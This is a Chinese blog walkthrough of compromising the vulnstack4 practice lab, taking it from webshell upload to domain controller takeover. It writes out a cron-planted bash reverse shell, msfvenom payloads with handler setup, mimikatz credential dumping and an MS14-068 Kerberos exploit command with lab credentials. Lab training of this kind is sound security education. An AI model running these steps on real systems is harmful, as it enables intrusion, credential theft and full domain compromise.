码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【红日靶场】vulnstack4-完整渗透过程


    系列文章目录

    【红日靶场】vulnstack1-完整渗透过程
    【红日靶场】vulnstack2-完整渗透过程
    【红日靶场】vulnstack3-完整渗透过程
    【红日靶场】vulnstack4-完整渗透过程


    文章目录

    • 系列文章目录
    • 前言
    • 一、p环境初始化
      • web虚拟机配置
      • win7配置:
      • DC配置:
      • kaliLinux配置:
      • 机器密码
    • 二、开始渗透
      • 靶场学习渗透路径
      • 信息收集
      • 外网打点
      • 容器逃逸
        • 拿另一个2002端口
      • 内网探测
      • 小插曲
      • 横向移动
      • MS14-068 域提权漏洞
      • 其他方法:Linux上线cs


    前言


    提示:以下是本篇文章正文内容,下面案例可供参考

    一、p环境初始化

    无网络环境net1(157段可以换成NAT模式)和net2(183段):
    在这里插入图片描述

    web虚拟机配置

    在这里插入图片描述

    win7配置:

    在这里插入图片描述

    DC配置:

    在这里插入图片描述

    kaliLinux配置:

    VMnet1网卡可以访问web:
    在这里插入图片描述
    全部开机

    机器密码

    ubuntu:ubuntu域成员机器
    douser:Dotest123
    DC:administrator:Test2008
    对应的网络:
    在这里插入图片描述
    修改root密码:
    在这里插入图片描述
    重新启动docker
    在这里插入图片描述
    docker restart $(docker ps -aq)
    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述

    二、开始渗透

    靶场学习渗透路径

    st漏洞利用
    phpmyadmin getshell
    tomcat 漏洞利用
    docker逃逸
    ms14-068
    ssh密钥利用
    流量转发
    历史命令信息泄露
    域渗透

    目标:192.168.157.128

    信息收集

    在这里插入图片描述

    在这里插入图片描述

    外网打点

    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述
    内网是在容器内:
    在这里插入图片描述
    传个冰蝎马:

    在这里插入图片描述
    传个马:
    在这里插入图片描述
    在这里插入图片描述
    穿个冰蝎马:
    在这里插入图片描述
    内网是172段:现在是容器的root权限
    容器环境确定:

    ls -alh /.dockerenv
    cat /proc/1/cgroup
    
    • 1
    • 2

    在这里插入图片描述

    容器逃逸

    有wget命令:
    在这里插入图片描述
    这里不存在特权模式启动容器逃逸:判断是否是特权模式启动,如果是以特权模式启动的话,CapEff对应的掩码值应该为0000003fffffffff。
    cat /proc/self/status |grep Cap
    在这里插入图片描述
    这个容器不具备逃逸的环境:
    在这里插入图片描述

    拿另一个2002端口

    在这里插入图片描述
    在这里插入图片描述
    在传一个冰蝎马:
    在这里插入图片描述
    在这里插入图片描述
    这个容器可能具备提权条件
    在这里插入图片描述
    再次逃逸:
    mkdir /julien
    在这里插入图片描述
    在这里插入图片描述
    kali监听:
    在这里插入图片描述

    弹shell到kali

    touch /julien/julien.sh
    echo "bash -i >& /dev/tcp/192.168.157.129/8888 0>&1" >/julien/julien.sh
    echo "* * * * * root bash /julien.sh" >> /julien/etc/crontab
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    现在root权限直接改密码:
    在这里插入图片描述
    连接失败:
    在这里插入图片描述
    但是发现root没有ssh的权限:查看用户
    在这里插入图片描述
    修改Ubuntu的密码:连接成功
    在这里插入图片描述
    直接切换root权限:
    在这里插入图片描述
    上线msf:
    生成木马:
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.157.129 LPORT=5555 -f elf > shell.elf

    kali监听:
    use exploit/multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set LHOST 192.168.157.129
    set LPORT 5555
    exploit
    上传执行
    在这里插入图片描述
    在这里插入图片描述
    做socke:
    在这里插入图片描述

    在这里插入图片描述
    session现在是会自动加路由到内网段
    在这里插入图片描述
    直接做:
    在这里插入图片描述
    修改配置:vim /etc/proxychains4.conf

    在这里插入图片描述
    测试一下内网:
    在这里插入图片描述

    内网探测

    直接fscan在kali中探测183网段:
    在这里插入图片描述

    小插曲

    扫到一半发现好像少了一台:
    这个win7应该是电源设置没做,大家记得做一下:
    在这里插入图片描述

    横向移动

    可以看到:129和130主机存在ms17-010
    在这里插入图片描述
    使用ms17-010:

    kali的地址为:192.168.157.129
    win7:192.168.183.129
    server2008:192.168.183.130
    在这里插入图片描述
    开始攻击:

    在这里插入图片描述
    没成功:
    在这里插入图片描述
    试一下130主机:
    在这里插入图片描述
    失败了

    使用代理的msf尝试利用:

    在这里插入图片描述
    在这里插入图片描述
    直接打蓝屏了win7:这次更猛直接卡死了
    硬件关机都不行了,服了
    在这里插入图片描述

    终于在重启3次后成功了:
    在这里插入图片描述
    在这里插入图片描述
    demo域:
    在这里插入图片描述

    尝试hash传递:(失败)
    在这里插入图片描述

    在这里插入图片描述

    前面介绍中有个ms14-068的漏洞:作者已经为我们准备好了工具
    在这里插入图片描述
    mimikatz.exe
    这里会列出密码
    sekurlsa::logonpasswords

    直接用mimikatz.exe抓取:先做持久化建用户
    我这ms17-010没shell了:直接在win7操作
    在这里插入图片描述
    这个靶场有问题:直接任务管理器结束(主机不会关机)
    在这里插入图片描述
    直接使用正向由kali去连接win7:
    生成:
    msfvenom -p windows/meterpreter/bind_tcp -f exe -o shell.exe
    放win7运行

    use exploit/multi/handler
    set payload  windows/meterpreter/bind_tcp
    set rhost  192.168.183.130
    run
    
    • 1
    • 2
    • 3
    • 4

    MS14-068 域提权漏洞

    ​上面我们已经抓到密码了

    条件:获得普通域用户以及密码 ,以及用户的suid ip为域控ip

    ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.131 -p Dotest123
    
    • 1

    运行:mimikatz
    mimikatz # kerberos::purge 清空凭证
    mimikatz # kerberos::list 查看凭证

    列表:
    mimikatz # kerberos::ptc TGT_douser@demo.com.ccache 导入票据
    在这里插入图片描述
    成功拿到域控:
    在这里插入图片描述

    其他方法:Linux上线cs

    这里感觉有点麻烦直接上线cs:
    在这里插入图片描述
    生成Linux马:

    在这里插入图片描述
    添加监听器:
    在这里插入图片描述
    在这里插入图片描述
    成功上线:
    在这里插入图片描述
    这里是Ubuntu权限可以切换root执行:
    在这里插入图片描述

    在这里插入图片描述
    这里不会用这个插件横向失败了,这里这个插件有会用的可以私我一下。

  • 相关阅读:
    GTX314L国产替代SI314—低功耗14通道电容触摸传感器芯片
    【数据结构与算法】<==>栈
    Java web第四次作业
    系统架构设计师(第二版)学习笔记----多媒体技术
    B站:李宏毅2020机器学习笔记 5 —— 分类器Classification
    Lua的resty-request库写的一个爬虫
    React18 渲染列表与添加key值
    后疫情时代,云计算如何为在线教育保驾护航
    Web安全:Vulfocus 靶场搭建.(漏洞集成平台)
    【Terraform】Terraform自动创建云服务器脚本
  • 原文地址:https://blog.csdn.net/qq_39583774/article/details/133650244
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号